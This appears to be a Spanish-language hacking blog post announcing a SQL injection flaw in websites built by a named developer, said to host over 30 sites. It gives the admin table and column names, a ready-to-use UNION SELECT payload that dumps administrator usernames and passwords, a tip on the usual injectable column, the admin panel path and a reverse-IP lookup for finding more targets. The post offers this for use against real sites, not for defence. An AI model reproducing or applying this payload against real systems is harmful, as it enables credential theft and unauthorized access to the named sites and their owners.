Es triste encontrar este tipo de seguridad en servidores como este. que ah muchos les hacen creer que son los mas seguros de la red, cuando no es asi. aqui les dejo unos screens de uno que me encontre que tieme mas de 30 sitios a su merced...
nota: no son todos los dominios....
Bug en web desarrolladora SUSTAM.COM
ahi haciendo un poco de pen-testing encontre una web con SQLi aqui les dejo la info
++++++++++++++++++++++++++++++++++++++++++++++++++++
web desarrolladora: SUSTAM.COM
Bug: SQLi
****************************************************
tabla:
administradores
****************************************************
columnas:
usuarios
clave
****************************************************
inyection:
-1+union+select+0,1,2,concat(usuario,0x3a,clave),4,5,6,7,8,9,10,11,12,13+from+administradores--
dato: varian los numeros de tablas en las webs, la vulnerable con mas frecuencia es la 3
*****************************************************
panel:
/admin
*****************************************************
DNSreverse:
http://www.ip-adress.com/reverse_ip/sustam.com
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
server info:
Suscribirse a:
Entradas (Atom)